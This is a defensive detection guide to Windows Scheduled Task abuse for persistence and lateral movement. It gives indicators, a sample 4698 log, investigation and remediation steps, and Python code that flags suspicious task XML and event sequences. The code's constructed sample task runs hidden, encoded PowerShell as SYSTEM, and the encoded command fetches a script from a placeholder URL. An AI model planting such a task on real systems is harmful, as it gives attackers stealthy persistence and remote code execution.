EventPeeker

Scheduled Task Abuse — Persistence and Lateral Execution

Windows Scheduled Tasks are a primary persistence mechanism abused by malware, ransomware, and post-exploitation frameworks. Attackers create tasks that survive reboots, run under SYSTEM context, and are easy to disguise with legitimate-sounding names.

Severity

High

ATT&CK Tactic

Persistence

Common attacker usage

  • Creating tasks that re-execute malware after reboot or user logoff
  • Running payloads under SYSTEM or a high-privilege account context
  • Naming tasks to blend in with legitimate Windows tasks (e.g. 'MicrosoftEdgeUpdateTaskMachine')
  • Using tasks to execute encoded PowerShell or download-and-run payloads
  • Modifying existing legitimate tasks to execute additional malicious actions
  • Creating tasks on remote hosts via at.exe, schtasks.exe, or WMI for lateral movement

Investigate immediately if

  • New task created outside of business hours or during a known attack window
  • Task action contains PowerShell -enc, cmd /c, or a URL
  • Task runs as SYSTEM or a service account and was created by an interactive user session
  • Task name closely resembles a legitimate Windows task name but is in an unexpected location
  • Task was created remotely (source IP is not a management server)

MITRE ATT&CK

Technique

T1053.005 · Scheduled Task

Tactic

Persistence


Security Relevance

Scheduled tasks are appealing to attackers because they require no kernel-level access, survive reboots automatically, can run in any user context including SYSTEM, and are difficult to detect without proper auditing. Event ID 4698 logs task creation with the full XML task definition including the action, trigger, and principal — this is the richest source of persistence evidence available in the Security event log.

Indicators of Malicious Use

  • Task action executing PowerShell with -EncodedCommand, -enc, or -w hidden
  • Task action pointing to a binary in %TEMP%, %APPDATA%, or a user-writable path
  • Task created by an account that doesn't normally create tasks (e.g. service accounts, standard users)
  • Task trigger set to OnLogon, OnIdle, or a very frequent repeat interval
  • Task principal running as SYSTEM when created by a non-admin process
  • Task XML containing a URL in the command or arguments field

Example Log Entry

Log Name: Security
Source:    Microsoft-Windows-Security-Auditing
Event ID:  4698

A scheduled task was created.

Subject:
  Account Name:  CORP\jsmith
  Logon ID:      0x4f2a1

Task Information:
  Task Name: \Microsoft\Windows\WindowsDefenderCheck
  Task Content:
    <Actions>
      <Exec>
        <Command>powershell.exe</Command>
        <Arguments>-WindowStyle Hidden -EncodedCommand JABjACAAPQ...</Arguments>
      </Exec>
    </Actions>

Investigation Steps

  1. Read the full task XML — the Action element contains exactly what will execute. Decode any Base64 arguments.
  2. Check the Principal — tasks running as SYSTEM created by a standard user session are highly suspicious.
  3. Check the Trigger — tasks triggered on logon, at startup, or at very frequent intervals warrant closer inspection.
  4. Check the Subject — who created the task, and was that account legitimately logged in at that time?
  5. Look for schtasks.exe or taskschd.dll in Event ID 4688 process creation logs around the same time.
  6. Check whether the task action binary exists on disk and whether it is signed.
  7. Search for the same task name across all endpoints — ransomware and worms often replicate the same task on multiple hosts.
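The following is an added example (not EventPeeker's own code) that applies the indicator checks from the "Indicators of Malicious Use" list and the Base64 decoding from step 1 to the Task Content XML of a 4698 event. The XML namespace is the real Task Scheduler schema namespace; the sample task, the placeholder URL, the "frequent repeat" threshold of 10 minutes, and the argument-matching patterns are assumptions made for the example. -EncodedCommand payloads are Base64 over UTF-16LE text, so the decoded command is checked too: in the sample the URL is only visible after decoding.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace used in the <Task Content> of Event ID 4698
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Repeat intervals at or below this are treated as "very frequent" (assumption)
FREQUENT_REPEAT_SECONDS = 10 * 60

# Constructed sample: the encoded command is built here so the example is
# self-contained; example.invalid is a reserved placeholder domain, not an IoC.
_PLAINTEXT_COMMAND = "Invoke-WebRequest http://example.invalid/update.ps1"
_ENCODED = base64.b64encode(_PLAINTEXT_COMMAND.encode("utf-16-le")).decode("ascii")

SAMPLE_TASK_XML = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <TimeTrigger>
      <Repetition><Interval>PT5M</Interval></Repetition>
      <StartBoundary>2024-01-01T00:00:00</StartBoundary>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-WindowStyle Hidden -EncodedCommand {_ENCODED}</Arguments>
    </Exec>
  </Actions>
</Task>"""

# -e / -ec / -enc are the abbreviations PowerShell accepts for -EncodedCommand;
# "-e" followed by whitespace does not match -ExecutionPolicy.
_ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
_HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
_URL_RE = re.compile(r"https?://\S+", re.I)
_WRITABLE_RE = re.compile(r"%temp%|%appdata%|\\appdata\\|\\temp\\|\\users\\public\\", re.I)
_DURATION_RE = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def decode_encoded_command(arguments):
    """Return the decoded -EncodedCommand payload (Base64 of UTF-16LE) or None."""
    m = _ENC_RE.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def duration_seconds(iso_duration):
    """Parse the ISO 8601 durations Task Scheduler uses (e.g. PT5M, P1DT2H)."""
    m = _DURATION_RE.match(iso_duration.strip())
    if not m:
        return None
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def analyze_task(task_xml):
    """Apply the indicator checks to one 4698 task definition; returns sorted flag names."""
    root = ET.fromstring(task_xml)
    flags = set()

    for exec_el in root.findall(".//t:Actions/t:Exec", TASK_NS):
        command = exec_el.findtext("t:Command", "", TASK_NS) or ""
        arguments = exec_el.findtext("t:Arguments", "", TASK_NS) or ""
        decoded = decode_encoded_command(arguments)
        if decoded is not None or _HIDDEN_RE.search(arguments):
            flags.add("encoded_or_hidden_powershell")
        if _WRITABLE_RE.search(command) or _WRITABLE_RE.search(arguments):
            flags.add("user_writable_path")
        # Look at the decoded command as well: the URL may only appear after decoding
        if any(_URL_RE.search(s) for s in (command, arguments, decoded or "")):
            flags.add("url_in_action")

    triggers = root.find("t:Triggers", TASK_NS)
    if triggers is not None:
        for trig in triggers:
            local_name = trig.tag.split("}")[-1]
            if local_name in ("LogonTrigger", "IdleTrigger", "BootTrigger"):
                flags.add("logon_idle_or_boot_trigger")
            interval = trig.findtext("t:Repetition/t:Interval", None, TASK_NS)
            if interval:
                secs = duration_seconds(interval)
                if secs is not None and secs <= FREQUENT_REPEAT_SECONDS:
                    flags.add("frequent_repeat")

    # S-1-5-18 is the well-known SID for LocalSystem
    for user_id in root.findall(".//t:Principals/t:Principal/t:UserId", TASK_NS):
        uid = (user_id.text or "").strip().upper()
        if uid == "S-1-5-18" or uid.endswith("SYSTEM"):
            flags.add("system_principal")

    return sorted(flags)


if __name__ == "__main__":
    print("flags:", analyze_task(SAMPLE_TASK_XML))
    print("decoded:", decode_encoded_command(SAMPLE_TASK_XML))
```

The flags are deliberately independent so they can be weighted per environment; a logon trigger alone is common for legitimate updaters, whereas an encoded hidden PowerShell action running as SYSTEM with a five-minute repeat interval is the combination the guide above describes.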


Common False Positives

  • Software installers creating legitimate update tasks (Windows Update, Chrome, Office)
  • IT management tools (SCCM, PDQ) deploying scripts via scheduled tasks
  • Developer tools or build agents creating temporary tasks
  • Backup and antivirus agents creating maintenance tasks

Remediation

  • Delete the malicious task immediately: schtasks /delete /tn <task_name> /f
  • Review all scheduled tasks on the host: Get-ScheduledTask | Where-Object {$_.TaskPath -notlike '\Microsoft\*'}
  • Check for associated files — the task's action binary may be a dropper; remove it and run a full scan.
  • Rotate credentials for any account listed as the task's principal.
  • Enable Task Scheduler auditing if not already enabled — requires 'Audit Other Object Access Events' in Advanced Audit Policy to capture all five task lifecycle events (4698, 4699, 4700, 4701, 4702).
  • Restrict who can create scheduled tasks using Group Policy (deny schtasks.exe to non-admin accounts).

Related Event IDs

  • 4698 · Scheduled task created — the primary detection event with full XML payload
  • 4699 · Scheduled task deleted — attacker cleanup; 4698→4699 = one-time execution pattern
  • 4700 · Scheduled task enabled — the arming step in the disable→modify→enable payload swap
  • 4701 · Scheduled task disabled — defense impairment or prelude to task modification
  • 4702 · Scheduled task modified — task hijacking; stealthier than creation because the task name stays trusted
  • 4688 · Process creation — schtasks.exe or PowerShell Register-ScheduledTask used to create or modify the task
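The sequence patterns listed above (4698→4699 one-time execution, 4701→4702→4700 payload swap, and 4702 against a trusted task path) can be correlated per task name once the lifecycle events are collected. The following is an added example, not EventPeeker's code; the event records, task names and timestamps are constructed, and the one-hour correlation window is an assumption.

```python
from collections import defaultdict
from datetime import datetime, timedelta

CREATED, DELETED, ENABLED, DISABLED, MODIFIED = 4698, 4699, 4700, 4701, 4702

# Constructed sample stream of Task Scheduler lifecycle events (not real data)
SAMPLE_EVENTS = [
    {"time": "2024-03-01T02:10:00", "event_id": 4698, "task": "\\UpdateCheck"},
    {"time": "2024-03-01T02:11:30", "event_id": 4699, "task": "\\UpdateCheck"},
    {"time": "2024-03-01T03:00:00", "event_id": 4701, "task": "\\Microsoft\\Windows\\ExampleMaintenance"},
    {"time": "2024-03-01T03:00:05", "event_id": 4702, "task": "\\Microsoft\\Windows\\ExampleMaintenance"},
    {"time": "2024-03-01T03:00:10", "event_id": 4700, "task": "\\Microsoft\\Windows\\ExampleMaintenance"},
    {"time": "2024-03-01T09:00:00", "event_id": 4698, "task": "\\VendorUpdateTask"},
]

PATTERNS = {
    "one_time_execution": (CREATED, DELETED),
    "disable_modify_enable_swap": (DISABLED, MODIFIED, ENABLED),
}


def _find_ordered(seq, pattern, window):
    """Yield (start, end) for each in-order occurrence of pattern within the window."""
    hits = []
    for i, (t0, eid) in enumerate(seq):
        if eid != pattern[0]:
            continue
        want = 1
        for t, e in seq[i + 1:]:
            if t - t0 > window:
                break
            if e == pattern[want]:
                want += 1
                if want == len(pattern):
                    hits.append((t0, t))
                    break
    return hits


def correlate_task_events(events, window=timedelta(hours=1)):
    """Group lifecycle events by task name and report the suspicious sequences."""
    by_task = defaultdict(list)
    for ev in events:
        by_task[ev["task"]].append((datetime.fromisoformat(ev["time"]), ev["event_id"]))

    findings = []
    for task, seq in by_task.items():
        seq.sort()
        for name, pattern in PATTERNS.items():
            for start, end in _find_ordered(seq, pattern, window):
                findings.append({"pattern": name, "task": task,
                                 "start": start.isoformat(), "end": end.isoformat()})
        # A modification of a task under the Microsoft path keeps a trusted name;
        # flag it on its own so it is reviewed even without the full swap sequence.
        if task.lower().startswith("\\microsoft\\"):
            for t, eid in seq:
                if eid == MODIFIED:
                    findings.append({"pattern": "trusted_path_modified", "task": task,
                                     "start": t.isoformat(), "end": t.isoformat()})

    findings.sort(key=lambda f: (f["start"], f["pattern"]))
    return findings


if __name__ == "__main__":
    for finding in correlate_task_events(SAMPLE_EVENTS):
        print(finding)
```

The lone 4698 for \VendorUpdateTask produces no finding, which is the intended behaviour: creation by itself is handled by the indicator checks on the task XML, while this stage only reports the multi-event sequences.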
